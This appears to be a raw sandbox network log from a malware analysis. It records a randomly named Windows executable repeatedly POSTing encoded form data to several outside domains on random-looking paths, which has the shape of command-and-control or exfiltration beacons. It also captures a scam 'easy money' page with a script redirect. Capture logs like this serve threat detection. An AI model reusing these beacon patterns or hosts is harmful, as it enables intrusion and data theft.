                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1971&rtt_var=985&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: dc6<!DOCTYPE html><html><head><script> setTimeout(function(){ location.href="/index.php"; },5000);</script><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta property="og:image" content="/assets/social_img2.jpg"><meta property="og:title" content="Let's make
                                                                    Jan 10, 2025 21:31:45.060269117 CET | 224 | IN
                                                                    Data Ascii: money easily with mobile phone "> <meta property="og:description" content="We are the best earning site online paying over $35 million per month to 300,000 members"><meta property="og:image:width" content="600px"><m
                                                                    Jan 10, 2025 21:31:45.060285091 CET | 1236 | IN
                                                                    Data Ascii: eta property="og:image:height" content="324px"><meta property="og:url" content="https://www.kkpmoneysocial.top"><meta property="og:updated_time" content="1736541104"> <meta property="og:type" content="website"> <meta property="og:site_name
                                                                    Jan 10, 2025 21:31:45.060301065 CET  1236  IN
                                                                    Data Ascii: e) { var hour = 3000; var exp = new Date(); exp.setTime(exp.getTime() + hour*60*60*1000); document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString()+";path=/"; } function rset_Cookie_fas
                                                                    Jan 10, 2025 21:31:45.060319901 CET  448  IN
                                                                    Data Ascii: kie_fast('hasgo','moneyeasilylso.top');location.href='https://moneyeasilylso.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==';};});$.getScript('//moneyeasilyywe.top/typed.js?1736541104',function(){ if(!rget_Cookie('hasgo')){rset_
                                                                    Jan 10, 2025 21:31:45.060374022 CET  49  IN
                                                                    Data Ascii: ==';};}); </script> </body> </html>0


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    9           192.168.2.6  64228        209.74.77.107   80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:31:58.388870955 CET  747  OUT  POST /4t49/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.happyjam.life
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.happyjam.life
                                                                    Referer: http://www.happyjam.life/4t49/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=nQ80xGd328mxhYWdY9GHKknM5mZtt94ay+ZIKhdDq7VkIINqIAYa8dHYv/uF7VJh02hZWzx5u3ZS5q3ZX/Hf5FBUuGIATGWztYOcLBbNTKt1xW5cJqqgEKILbo2OyI7FBnrB6EEPGQiK0leZfDHhDMYjWLAGeAc/0x+gP+uv6cgreayucWAj+QOMWG9p0yiKvUHQxgY8IcPi
                                                                    Jan 10, 2025 21:31:58.975606918 CET  533  IN  HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:31:58 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    10          192.168.2.6  64229        209.74.77.107   80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:32:00.941500902 CET  771  OUT  POST /4t49/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.happyjam.life
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.happyjam.life
                                                                    Referer: http://www.happyjam.life/4t49/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN9kGMJqLEMa/dHYnfuc/VIj03ckWyN5u3NS5qHZXozc/FBWimICemWztYOcLBfnTK11wmJcLOGjNqIEMY2O2I7BBnqi6Bc1GSaK0gyZR2niKMYhLbBkVyJy0DygFO/DhP8KSMv0AlAAsAuOWElb0SigtU/Qj3UbHoqBH4KXUK0plr1nV6ezMzwMVg==
                                                                    Jan 10, 2025 21:32:01.521608114 CET  533  IN  HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:32:01 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    11          192.168.2.6  64230        209.74.77.107   80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:32:03.501627922 CET  1784  OUT  POST /4t49/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.happyjam.life
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.happyjam.life
                                                                    Referer: http://www.happyjam.life/4t49/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS= [TRUNCATED]
                                                                    Jan 10, 2025 21:32:04.083547115 CET  533  IN  HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:32:03 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    12          192.168.2.6  64231        209.74.77.107   80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:32:06.040859938 CET  489  OUT  GET /4t49/?bJMLqbS=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.happyjam.life
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:06.670361042 CET  548  IN  HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 20:32:06 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    13          192.168.2.6  64232        84.32.84.32     80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:32:11.760071039 CET  762  OUT  POST /vc3u/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.123hellodrive.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.123hellodrive.shop
                                                                    Referer: http://www.123hellodrive.shop/vc3u/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=MKbu1HLFE7i58hZWNNtskxItcmcEaqeTd7Sdo11vSZLmmPOQz3JolgFOSnzSzsg3sX26TVeFb774HYU9htsXVltWaCJOHecRMKa+o+jlsqDVpI/6UURgUGXL0NkzyMR2EIyHTKkzm+mqyadW8FrSgFk8yhDRhbESJjToXo2FY3ZYB/PrW6aXoxcHWHC9I292rCnwYCGMBD4I


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    14          192.168.2.6  64233        84.32.84.32     80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:32:14.311113119 CET  786  OUT  POST /vc3u/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.123hellodrive.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.123hellodrive.shop
                                                                    Referer: http://www.123hellodrive.shop/vc3u/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/SrvmjdGQ9T9ooAFOHXzt3sg8sX6UTQ2Fb7/4HZk9he0UTltISiJMI+cRMKa+o+m4srrVo4P6S1R/ZmXKj9kz2MRIEIy1TIQKm4iqyfxW5HSg51kyxRChiOoXPFOnIqugY1dnNpSxKJa06h8FWFaPIW9cpCfwKVKrO3drhmeCl/cacCNIspAmO6maMg==


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    15          192.168.2.6  64234        84.32.84.32     80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:32:16.860701084 CET  1799  OUT  POST /vc3u/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.123hellodrive.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.123hellodrive.shop
                                                                    Referer: http://www.123hellodrive.shop/vc3u/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS= [TRUNCATED]


                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                    16          192.168.2.6  64236        84.32.84.32     80                2496  C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Jan 10, 2025 21:32:19.452558994 CET  494  OUT  GET /vc3u/?bJMLqbS=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&xHrti=IpSlbxE0jR HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.123hellodrive.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:19.896372080 CET  1236  IN  HTTP/1.1 200 OK
                                                                    Date: Fri, 10 Jan 2025 20:32:19 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 9c700232e54c7b1875af547ba2ac1eab-bos-edge4
                                                                    Expires: Fri, 10 Jan 2025 20:32:18 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                    Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                    17   192.168.2.6   64237   154.208.202.225   80   2496   C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp   Bytes transferred   Direction   Data
                                                                    Jan 10, 2025 21:32:25.597104073 CET   747   OUT   POST /k6vm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.zoomlive.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.zoomlive.live
                                                                    Referer: http://www.zoomlive.live/k6vm/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=NStUcy3QdCnATr7YdbjyySjAgyxamkvQdWxD+VwoPLTcuglP0zW82tFsj+0JMnzRVLCb8mPCLHiSzfGavbodiVeylQ/9A/P9R12V8IwayCSn49jPaO06LOySDIrYhkwF7rTxOcOyeCgbk/B1w8zk5GZD15qtGL9uBM6XASKgd9XJhM+Idcs6ATGngnFjbb9x6GhlNTELNevO
                                                                    Jan 10, 2025 21:32:26.518134117 CET   190   IN   HTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:36:54 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                    18   192.168.2.6   64238   154.208.202.225   80   2496   C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp   Bytes transferred   Direction   Data
                                                                    Jan 10, 2025 21:32:28.141944885 CET   771   OUT   POST /k6vm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.zoomlive.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.zoomlive.live
                                                                    Referer: http://www.zoomlive.live/k6vm/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P//cuC9P6SW81tFsoe0MRXzeVLPu8jPCLHmSza6assEejFewtw/7E/P9R12V8JU0yCan4P3Pats5U+yTKorY2UwB7rTDOdiUeAIbk9Z1zpHjwGZB7ZroIeEeHsTPICi4K/jvk6jSBvsZSDmlgldRb79b4GZlfEIsCqKtBR5SLYcOt7vTdBeTvmAoHQ==
                                                                    Jan 10, 2025 21:32:29.087755919 CET   190   IN   HTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:36:56 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                    19   192.168.2.6   64239   154.208.202.225   80   2496   C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp   Bytes transferred   Direction   Data
                                                                    Jan 10, 2025 21:32:30.691261053 CET   1784   OUT   POST /k6vm/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.zoomlive.live
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.zoomlive.live
                                                                    Referer: http://www.zoomlive.live/k6vm/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS= [TRUNCATED]
                                                                    Jan 10, 2025 21:32:31.638020039 CET   190   IN   HTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:36:59 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                    20   192.168.2.6   64240   154.208.202.225   80   2496   C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp   Bytes transferred   Direction   Data
                                                                    Jan 10, 2025 21:32:33.229238033 CET   489   OUT   GET /k6vm/?xHrti=IpSlbxE0jR&bJMLqbS=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.zoomlive.live
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Jan 10, 2025 21:32:34.634125948 CET   180   IN   HTTP/1.1 503 Service Unavailable
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 20:37:02 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                    21   192.168.2.6   64241   77.68.64.45   80   2496   C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp   Bytes transferred   Direction   Data
                                                                    Jan 10, 2025 21:32:39.704314947 CET   759   OUT   POST /725g/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.dietcoffee.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Origin: http://www.dietcoffee.online
                                                                    Referer: http://www.dietcoffee.online/725g/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=jgo+nmRTntVNHPAqzKLhCXPBYugCVbFBBhle2vKc8wEWf5bPava4qyAMWoeusxJozkexmylkIOCYP210mVXAm0Iyn9ytq04Ul3bl/70+uyOK2YNzJ1FEmw6w2R1yhM1bYThGo1RxWqZhN7VAuWFqtkYLylhfXrASZhZL5Ikk0ZPeKt35AdlWuGSadZVjkJX8MGixwrxzCKoK
                                                                    Jan 10, 2025 21:32:40.316082954 CET   393   IN   HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:41 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                    22   192.168.2.6   64242   77.68.64.45   80   2496   C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp   Bytes transferred   Direction   Data
                                                                    Jan 10, 2025 21:32:42.253525972 CET   783   OUT   POST /725g/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.dietcoffee.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Origin: http://www.dietcoffee.online
                                                                    Referer: http://www.dietcoffee.online/725g/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FcWR8nPbua4pyAMeIehiRIkzkCDmzpkIOGYP3F0mkXBmkI0rdyvlU4Ul3bl/7wEuyWK2o9zIUFHvQ63xR1yqs1XYTgjowxfWsdhN7lA3nFtnkYF/Fg2b6pgTgYh1r0ci5v1Pbqjcul18WyYdbNRkpXWOGaxi89UN+NptIU/CVYQmlxB/QeXQZd9aw==
                                                                    Jan 10, 2025 21:32:42.836327076 CET   393   IN   HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:43 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
                                                                    23   192.168.2.6   64243   77.68.64.45   80   2496   C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe
                                                                    Timestamp   Bytes transferred   Direction   Data
                                                                    Jan 10, 2025 21:32:45.187633038 CET   1796   OUT   POST /725g/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.dietcoffee.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Origin: http://www.dietcoffee.online
                                                                    Referer: http://www.dietcoffee.online/725g/
                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                    Data Ascii: bJMLqbS= [TRUNCATED]
                                                                    Jan 10, 2025 21:32:45.772799969 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.25.3
                                                                    Date: Fri, 10 Jan 2025 20:32:46 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
